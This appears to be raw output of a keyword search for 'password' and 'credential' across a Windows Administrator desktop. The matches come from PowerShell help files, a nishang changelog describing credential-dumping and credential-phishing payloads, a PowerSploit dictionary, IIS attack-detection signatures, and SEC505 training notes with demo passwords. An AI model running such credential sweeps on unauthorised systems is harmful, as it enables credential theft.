\nC:\\Users\\Administrator\\Desktop\\log.txt:285:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:294: and then \nenter the password that you assigned during \nC:\\Users\\Administrator\\Desktop\\log.txt:288:UseDefaultCredentials\nC:\\Users\\Administrator\\Desktop\\log.txt:289:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:157: parameter \nthat provides the explicit credentials of \nC:\\Users\\Administrator\\Desktop\\log.txt:292:Credential\nC:\\Users\\Administrator\\Desktop\\log.txt:293:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:164: Credential \nparameter is valid only when you use the \nC:\\Users\\Administrator\\Desktop\\log.txt:295:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory.hel\np.txt:32: Account and Password Policy \nC:\\Users\\Administrator\\Desktop\\log.txt:298:Remove-ADFineGrainedPasswordPolicy.\nC:\\Users\\Administrator\\Desktop\\log.txt:300:bad password count greater than five:\nC:\\Users\\Administrator\\Desktop\\log.txt:302:ADFineGrainedPasswordPolicy\nC:\\Users\\Administrator\\Desktop\\log.txt:304:(sAMUserName)\nC:\\Users\\Administrator\\Desktop\\log.txt:306:ADFineGrainedPasswordPolicy\nC:\\Users\\Administrator\\Desktop\\log.txt:308:ADDefaultDomainPasswordPolicy\nC:\\Users\\Administrator\\Desktop\\log.txt:310:ADFineGrainedPasswordPolicy\nC:\\Users\\Administrator\\Desktop\\log.txt:312:fine grained password policy object; that is, an AD\nC:\\Users\\Administrator\\Desktop\\log.txt:314:msDS-PasswordSettings in AD DS and is derived from\nC:\\Users\\Administrator\\Desktop\\log.txt:316:ADFineGrainedPasswordPolicy may contain the following properties in\nC:\\Users\\Administrator\\Desktop\\log.txt:318:attribute: msDS-PasswordComplexityEnabled\nC:\\Users\\Administrator\\Desktop\\log.txt:319:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_Obj\nectModel.help.txt:215: MaxPasswordAge \nC:\\Users\\Administrator\\Desktop\\log.txt:322:attribute: msDS-MaximumPasswordAge\nC:\\Users\\Administrator\\Desktop\\log.txt:323:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_Obj\nectModel.help.txt:218: MinPasswordAge \nC:\\Users\\Administrator\\Desktop\\log.txt:326:attribute: msDS-MinimumPasswordAge\nC:\\Users\\Administrator\\Desktop\\log.txt:328:MinPasswordLength - A property of type System.Int32, derived from the\nC:\\Users\\Administrator\\Desktop\\log.txt:330:attribute: msDS-MinimumPasswordLength\nC:\\Users\\Administrator\\Desktop\\log.txt:332:PasswordHistoryCount - A property of type System.Int32, derived from\nC:\\Users\\Administrator\\Desktop\\log.txt:334:attribute: msDS-PasswordHistoryLength\nC:\\Users\\Administrator\\Desktop\\log.txt:336:attribute: msDS-PasswordSettingsPrecedence\nC:\\Users\\Administrator\\Desktop\\log.txt:338:msDS-PasswordReversibleEncryptionEnabled\nC:\\Users\\Administrator\\Desktop\\log.txt:340:AllowReversiblePasswordEncryption - A property of type System.Boolean,\nC:\\Users\\Administrator\\Desktop\\log.txt:342:ms-DS-UserEncryptedTextPasswordAllowed\nC:\\Users\\Administrator\\Desktop\\log.txt:344:CannotChangePassword - A property of type System.Boolean, derived from\nC:\\Users\\Administrator\\Desktop\\log.txt:346:LastBadPasswordAttempt - A property of type System.DateTime, derived\nC:\\Users\\Administrator\\Desktop\\log.txt:348:directory attribute: badPasswordTime\nC:\\Users\\Administrator\\Desktop\\log.txt:350:PasswordExpired - A property of type System.Boolean, for AD DS it is\nC:\\Users\\Administrator\\Desktop\\log.txt:352:attribute msDS-UserPasswordExpired\nC:\\Users\\Administrator\\Desktop\\log.txt:354:PasswordLastSet - A property of type System.DateTime, derived from the\nC:\\Users\\Administrator\\Desktop\\log.txt:356:PasswordNeverExpires - A property of type System.Boolean, for AD LDS\nC:\\Users\\Administrator\\Desktop\\log.txt:358:attribute: msDS-UserDontExpirePassword\nC:\\Users\\Administrator\\Desktop\\log.txt:360:PasswordNotRequired - A property of type System.Boolean, for AD DS it\nC:\\Users\\Administrator\\Desktop\\log.txt:362:attribute: ms-DS-UserPasswordNotRequired\nC:\\Users\\Administrator\\Desktop\\log.txt:364:ADDefaultDomainPasswordPolicy\nC:\\Users\\Administrator\\Desktop\\log.txt:366:domain-wide password policy of an Active Directory\nC:\\Users\\Administrator\\Desktop\\log.txt:368:ADDefaultDomainPasswordPolicy may contain the following properties\nC:\\Users\\Administrator\\Desktop\\log.txt:369:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_Obj\nectModel.help.txt:721: MaxPasswordAge \nC:\\Users\\Administrator\\Desktop\\log.txt:371:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ActiveDirectory\\en-US\\about_ActiveDirectory_Obj\nectModel.help.txt:724: MinPasswordAge \nC:\\Users\\Administrator\\Desktop\\log.txt:374:MinPasswordLength - A property of type System.Int32, derived from the\nC:\\Users\\Administrator\\Desktop\\log.txt:376:PasswordHistoryCount - A property of type System.Int32, derived from\nC:\\Users\\Administrator\\Desktop\\log.txt:378:C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ScheduledJob\nC:\\Users\\Administrator\\Desktop\\log.txt:380:permissions of the user who is specified by the Credential\nC:\\Users\\Administrator\\Desktop\\log.txt:382:C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\PowerShell\nC:\\Users\\Administrator\\Desktop\\log.txt:383:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters\n.help.txt:55: PSCredential\nC:\\Users\\Administrator\\Desktop\\log.txt:384:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters\n.help.txt:216: user's credentials \nC:\\Users\\Administrator\\Desktop\\log.txt:387:NegotiateWithImplicitCredential. The default \nC:\\Users\\Administrator\\Desktop\\log.txt:388:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters\n.help.txt:227: CAUTION: Credential \nC:\\Users\\Administrator\\Desktop\\log.txt:391:which the user's credentials are passed \nC:\\Users\\Administrator\\Desktop\\log.txt:393:computer is compromised, the credentials that \nC:\\Users\\Administrator\\Desktop\\log.txt:395:command must include the PSCredential \nC:\\Users\\Administrator\\Desktop\\log.txt:396:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters\n.help.txt:336: -PSCredential \nC:\\Users\\Administrator\\Desktop\\log.txt:397:\nC:\\Users\\Administrator\\Desktop\\log.txt:399:that contains a PSCredential object, \nC:\\Users\\Administrator\\Desktop\\log.txt:401:Get-Credential cmdlet returns. If \nC:\\Users\\Administrator\\Desktop\\log.txt:402:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_ActivityCommonParameters\n.help.txt:348: password.\nC:\\Users\\Administrator\\Desktop\\log.txt:404:PSCredential. The PS-prefixed parameters configure\nC:\\Users\\Administrator\\Desktop\\log.txt:406:mechanism that is used to authenticate the user's credentials\nC:\\Users\\Administrator\\Desktop\\log.txt:408:Kerberos, Negotiate, and NegotiateWithImplicitCredential.\nC:\\Users\\Administrator\\Desktop\\log.txt:409:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters\n.help.txt:102: CAUTION: Credential \nC:\\Users\\Administrator\\Desktop\\log.txt:412:credentials are passed to a remote computer to be\nC:\\Users\\Administrator\\Desktop\\log.txt:414:credentials that are passed to it can be used to control\nC:\\Users\\Administrator\\Desktop\\log.txt:416:the PSCredential parameter. Also, the computer must be\nC:\\Users\\Administrator\\Desktop\\log.txt:417:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters\n.help.txt:209: -PSCredential \nC:\\Users\\Administrator\\Desktop\\log.txt:418:\nC:\\Users\\Administrator\\Desktop\\log.txt:420:contains a PSCredential object, such as one that the\nC:\\Users\\Administrator\\Desktop\\log.txt:421:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_WorkflowCommonParameters\n.help.txt:216: Get-Credential \nC:\\Users\\Administrator\\Desktop\\log.txt:424:password.\nC:\\Users\\Administrator\\Desktop\\log.txt:425:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_Workflows.help.txt:157: \n -Credential \nC:\\Users\\Administrator\\Desktop\\log.txt:427:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\en-US\\about_Workflows.help.txt:174: \n -Credential \nC:\\Users\\Administrator\\Desktop\\log.txt:429:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Automatic_Variables.help.txt:109: \ntypically C:\\Users\\.\nC:\\Users\\Administrator\\Desktop\\log.txt:430:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:181:\n parameter set, a UserName \nC:\\Users\\Administrator\\Desktop\\log.txt:432:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:194:\n $UserName,\nC:\\Users\\Administrator\\Desktop\\log.txt:433:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:220:\n $UserName,\nC:\\Users\\Administrator\\Desktop\\log.txt:434:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:561:\n $UserName\nC:\\Users\\Administrator\\Desktop\\log.txt:435:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_OutputTypeAttribute.help.txt:133:\n $UserName\nC:\\Users\\Administrator\\Desktop\\log.txt:437:credentials. It\nC:\\Users\\Administrator\\Desktop\\log.txt:438:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Jobs.help.txt:305: credentials to run \nthe command. The value of the Reason \nC:\\Users\\Administrator\\Desktop\\log.txt:440:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Language_Modes.help.txt:172: \nPSCredential\nC:\\Users\\Administrator\\Desktop\\log.txt:441:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Pipelines.help.txt:367: \nParameter [Credential] PIPELINE INPUT \nC:\\Users\\Administrator\\Desktop\\log.txt:443:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Preference_Variables.help.txt:1084: \n ProxyCredential :\nC:\\Users\\Administrator\\Desktop\\log.txt:445:credentials of a member of \nC:\\Users\\Administrator\\Desktop\\log.txt:446:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:142: only if \nyou can supply the credentials of the user \nC:\\Users\\Administrator\\Desktop\\log.txt:448:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:144: \nincludes RunAs credentials. Otherwise, you can \nC:\\Users\\Administrator\\Desktop\\log.txt:451:credentials that were used \nC:\\Users\\Administrator\\Desktop\\log.txt:453:credentials of\nC:\\Users\\Administrator\\Desktop\\log.txt:454:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:63: name and \npassword credentials on the local computer or the \nC:\\Users\\Administrator\\Desktop\\log.txt:455:credentials\nC:\\Users\\Administrator\\Desktop\\log.txt:456:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:65: The credentials \nand the rest of the transmission are \nC:\\Users\\Administrator\\Desktop\\log.txt:458:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:513: to use the \nCredential parameter of the Invoke-Command, \nC:\\Users\\Administrator\\Desktop\\log.txt:460:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:514: or \nEnter-PSSession cmdlets to provide the credentials of \nC:\\Users\\Administrator\\Desktop\\log.txt:462:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:521: credentials.\nC:\\Users\\Administrator\\Desktop\\log.txt:463:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Requirements.help.txt:62: \nprovide the credentials of an administrator. \nC:\\Users\\Administrator\\Desktop\\log.txt:465:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:273: \nHOW TO PROVIDE ADMINISTRATOR CREDENTIALS \nC:\\Users\\Administrator\\Desktop\\log.txt:466:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:279: \ncomputer. Credentials are sometimes required \nC:\\Users\\Administrator\\Desktop\\log.txt:468:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:283: \ncomputer, or can provide the credentials of a \nC:\\Users\\Administrator\\Desktop\\log.txt:470:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:284: \ngroup, use the Credential parameter of the \nC:\\Users\\Administrator\\Desktop\\log.txt:473:the credentials of an\nC:\\Users\\Administrator\\Desktop\\log.txt:475:-Credential Domain01\\Admin01\nC:\\Users\\Administrator\\Desktop\\log.txt:476:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:292: \nFor more information about the Credential \nC:\\Users\\Administrator\\Desktop\\log.txt:478:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:374: 2. \nUse the Credential parameter in all remote \nC:\\Users\\Administrator\\Desktop\\log.txt:481:submitting the credentials\nC:\\Users\\Administrator\\Desktop\\log.txt:482:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:400: 2. \nVerify that a password is set on the \nC:\\Users\\Administrator\\Desktop\\log.txt:484:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:401: \npassword is not set or the password value \nC:\\Users\\Administrator\\Desktop\\log.txt:486:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:404: \nTo set password for your user account, use \nC:\\Users\\Administrator\\Desktop\\log.txt:488:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:408: 3. \nUse the Credential parameter in all remote \nC:\\Users\\Administrator\\Desktop\\log.txt:491:submitting the credentials\nC:\\Users\\Administrator\\Desktop\\log.txt:492:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:544: \n -- ProxyCredential\nC:\\Users\\Administrator\\Desktop\\log.txt:494:ProxyAuthentication, and ProxyCredential\nC:\\Users\\Administrator\\Desktop\\log.txt:496:-ProxyCredential Domain01\\User01\nC:\\Users\\Administrator\\Desktop\\log.txt:497:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:44: function \nScreenPassword($instance)\nC:\\Users\\Administrator\\Desktop\\log.txt:499:ScreenPassword($a) }\nC:\\Users\\Administrator\\Desktop\\log.txt:500:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:53: This script \nchecks each user account. The ScreenPassword \nC:\\Users\\Administrator\\Desktop\\log.txt:503:password-protected \nC:\\Users\\Administrator\\Desktop\\log.txt:504:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:55: screen saver. If \nthe screen saver is password protected, the \nC:\\Users\\Administrator\\Desktop\\log.txt:506:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:529: $Cred = \nGet-Credential\nC:\\Users\\Administrator\\Desktop\\log.txt:507:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:530: \nInvoke-Command $s {Remove-Item .\\Test*.ps1 -Credential \nC:\\Users\\Administrator\\Desktop\\log.txt:509:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:537: $Cred = \nGet-Credential\nC:\\Users\\Administrator\\Desktop\\log.txt:511:-Credential $c} -ArgumentList $Cred \nC:\\Users\\Administrator\\Desktop\\log.txt:512:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Script_Internationalization.help.txt:157:if\n (!($username)) { $msgTable.promptMsg } \nC:\\Users\\Administrator\\Desktop\\log.txt:514:can supply the credentials of a\nC:\\Users\\Administrator\\Desktop\\log.txt:515:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Session_Configuration_Files.help.txt:230: \n RunAsPassword \nC:\\Users\\Administrator\\Desktop\\log.txt:516:NoteProperty System.String RunAsPassword=\nC:\\Users\\Administrator\\Desktop\\log.txt:518:password. The \nC:\\Users\\Administrator\\Desktop\\log.txt:519:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:174: password ensures \nthat no one can use or access the \nC:\\Users\\Administrator\\Desktop\\log.txt:521:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:175: your consent. \nCreate and enter a password that you can \nC:\\Users\\Administrator\\Desktop\\log.txt:523:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:176: use this password \nlater to retrieve the certificate.\nC:\\Users\\Administrator\\Desktop\\log.txt:524:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:277: 6. Type a \npassword, and then type it again to confirm.\nC:\\Users\\Administrator\\Desktop\\log.txt:525:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:293: 4. On the \nPassword page, select \"Enable strong private \nC:\\Users\\Administrator\\Desktop\\log.txt:527:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:294: and then \nenter the password that you assigned during \nC:\\Users\\Administrator\\Desktop\\log.txt:530:UseDefaultCredentials\nC:\\Users\\Administrator\\Desktop\\log.txt:531:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:157: parameter \nthat provides the explicit credentials of \nC:\\Users\\Administrator\\Desktop\\log.txt:534:Credential\nC:\\Users\\Administrator\\Desktop\\log.txt:535:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\about_Updatable_Help.help.txt:164: Credential \nparameter is valid only when you use the \nC:\\Users\\Administrator\\Desktop\\nishang-master\\CHANGELOG.txt:32:- Added support for dumping cleartext credentials from RDP sessions for \nInvoke-MimikatzWfigestDowngrade.\nC:\\Users\\Administrator\\Desktop\\nishang-master\\CHANGELOG.txt:49:- Removed hard coded credentials from Invoke-PSGcat.ps1 and Invoke-PSGcat in \nPowerpreter. So embarrassing!\nC:\\Users\\Administrator\\Desktop\\nishang-master\\CHANGELOG.txt:74:- Credentials script renamed to Invoke-CredentialsPhish.\nC:\\Users\\Administrator\\Desktop\\nishang-master\\CHANGELOG.txt:186:- Fixed help in Credentials.ps1\nC:\\Users\\Administrator\\Desktop\\nishang-master\\CHANGELOG.txt:191:- Fixed a bug in Credentials.ps1\nC:\\Users\\Administrator\\Desktop\\nishang-master\\CHANGELOG.txt:195:- Credentials payload now validates both local and AD crdentials. If creds \nentered could not be validated locally or at AD, credential prompt is shown again.\nC:\\Users\\Administrator\\Desktop\\nishang-master\\CHANGELOG.txt:208:- Removed delay in the credentials payload's prompt. Now the prompt asking \nfor credentials will keep appearing instantly if nothing is entered.\nC:\\Users\\Administrator\\Desktop\\nishang-master\\CHANGELOG.txt:210:- Removed hard coded credentials from Credentials.ps1 :| and edited the code \nto accept user input.\nC:\\Users\\Administrator\\Desktop\\PowerSploit-master\\Recon\\Dictionaries\\generic.txt:969:password/\nC:\\Users\\Administrator\\Desktop\\PowerSploit-master\\Recon\\Dictionaries\\generic.txt:970:passwords/\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Laptop-Setup-README-NOW.txt:46:Note: The script will reset your password to \"P@ssword\" inside \nthe VM.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day1-PowerShell\\Examples\\signatures.txt:17:iisadmpwd Attempts to access the IIS \n4.0 change password scripts (reconnaissance).\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day1-PowerShell\\Examples\\signatures.txt:47:/\\~.+|\\%2f\\%7e Attempts to use a /~ \nin a request (possible username search).\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day1-PowerShell\\Misc\\Sample_PowerShell_Transcript_Log.txt:4:Username: TESTING\\TestUser47\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day2-Hardening\\IIS\\Log_Analysis\\Signatures.txt:17:iisadmpwd Attempts to access \nthe IIS 4.0 change password scripts (reconnaissance).\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day2-Hardening\\IIS\\Log_Analysis\\Signatures.txt:47:/\\~.+|\\%2f\\%7e Attempts to \nuse a /~ in a request (possible username search).\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:4:The passwords of local administrative accounts should \nbe changed regularly and these passwords should be different from one computer to the next. But how can this been done securely and \nconveniently? How can this be done for free? \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:15:Copy the Update-PasswordArchive.ps1 script into that \nshared folder (\\\\server\\share).\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:17:Using Group Policy, SCCM, a third-party EMS, \nSCHTASKS.EXE or some other technique, create a scheduled job on every computer that runs once per week (or every night) under Local System \ncontext that executes the following command: \"powershell.exe \\\\server\\share\\update-passwordarchive.ps1 -certificatefilepath \n\\\\server\\share\\cert.cer -passwordarchivepath \\\\server\\share -localusername administrator\". This resets the password on the local \nAdministrator account, or whatever account is specified, with a 15-25 character, random complex password. The password is encrypted in \nmemory with the public key of the certificate (cert.cer) and saved to an archive file to the specified share (\\\\server\\share). \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:19:When a password for a computer (laptop47) needs to \nbe recovered, the trusted administrator should run from their own local computer the following PowerShell script: \n\"recover-passwordarchive.ps1 -passwordarchivepath \\\\server\\share -computername laptop47 -username helpdesk\". This downloads the necessary \nencrypted files and decrypts them locally in memory using the private key of the administrator, displaying the plaintext password within \nPowerShell.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:26:PowerShell 2.0 or later must be installed on both \nthe computer with the local user account whose password is to be reset and also on the administrators' computers who will recover these \npasswords in plaintext.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:28:The Update-PasswordArchive.ps1 script, which resets \nthe password, must run with administrative or Local System privileges.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:41:Copy the \\Day2-DAC\\UpdatePasswords folder to your \nhard drive.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:43:In File Explorer, double-click the \n\"Password-is-password.pfx\" file to import the test certificate and private key into your current user store (accept all the defaults). The \npassword is...password.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:45:Open PowerShell with administrative privileges and \nrun this command to reset the password on the Guest account:\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:47: .\\Update-PasswordArchive.ps1 -LocalUserName \nGuest -CertificateFilePath .\\PublicKeyCert.cer\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:53:If you open the file in Notepad or a hex editor, \nyou'll see that it has been encrypted with the public key in the PublicKeyCert.cer file. The private key for this public key has already \nbeen imported into your local user certificate store, hence, you can use your private key to extract the password from the encrypted file. \nUnless hackers have stolen your private key, they will not be able to decrypt the file and obtain the password inside it.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:55:To obtain the plaintext password, run this command:\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:57: .\\Recover-PasswordArchive.ps1 -ComputerName \n$env:computername -UserName Guest\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:59:The output is an object with the plaintext password \nand other properties, similar to this:\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:63: UserName : Guest\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:68: Password : b4EAti!HiLX]QI2\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:70:The password property can now be piped into other \ncommands or copied into the wetware clipboard through your retinas.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:74: get-help -full .\\Update-PasswordArchive.ps1 \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:81:The password is never sent over the network in \nplaintext, never saved to disk in plaintext, and never exposed as a command-line argument, either when resetting the password or when \nrecovering it later. The new password is generated randomly in the memory of the PowerShell process running on the computer where the \npassword is reset. The process runs for less than a second as Local System in the background. \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:83:Different certificates can be used at different \ntimes, as long as their private keys are available to the administrator. When recovering a password, the correct certificate and private \nkey will be used automatically. A smart card can be used too. The script has been successfully tested with the Common Access Card (CAC) \nused by the U.S. military and DoD. \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:85:If the shared folder is not accessible to the \ncomputer when the scheduled job runs, the password is not reset.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:87:If multiple administrators must be able to recover \nthe plaintext passwords, export the relevant certificate and private key to a PFX file and import it into each administrator's local \nprofile. Because this is not a certificate used to uniquely identify a person or device, everyone on the help desk could have a copy of its \nprivate key (though this increases the risk of private key exposure as more copies are distributed). \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:91:The update script writes to the Application event \nlog whenever and wherever the script is run (Source: PasswordArchive, Event ID: 9013).\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:93:The script can only be used to reset the passwords \nof local accounts, not domain accounts in AD.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:100:Keep the private key for the certificate used to \nencrypt the password archive files secure, such as on a smart card. This is the most important factor. \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:102:If the private key for the certificate is \ncompromised, create a new key pair, replace the certificate file (.CER) in the shared folder, and immediately remotely trigger the scheduled \njob on all machines using Group Policy, SCHTASKS.EXE or some other technique. Once all passwords have been changed, the fact that the old \nprivate key has been compromised does not mean any current passwords are known. \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:104:Use an RSA public key which is 2048 bits or larger. \n The public key encrypts a random 256-bit Rijndael key, which encrypts the password. Every file has a different Rijndael key. RSA and \nRijndael are used for maximum backwards compatibility (using AES explicitly in the script requires .NET Framework 3.5 or later). \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:106:Prevent modification of the \nUpdate-PasswordArchive.ps1 script itself by digitally signing the script, enforcing script signature requirements, and using restrictive \nNTFS permissions. Only allow NTFS read access to the script to those identities (computer accounts) which need to run it. Use NTFS \nauditing to track changes to the script.\nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:108:Attackers may try to corrupt or delete the existing \npassword archive files to prevent access to current passwords. Each archive file contains an encrypted SHA256 hash of the username, \ncomputername and password in that file in order to detect modified or damaged bits; the hash is checked whenever a password is recovered. \nC:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:127:An attacker might try to generate millions of \nspoofed archive files and add them to the shared 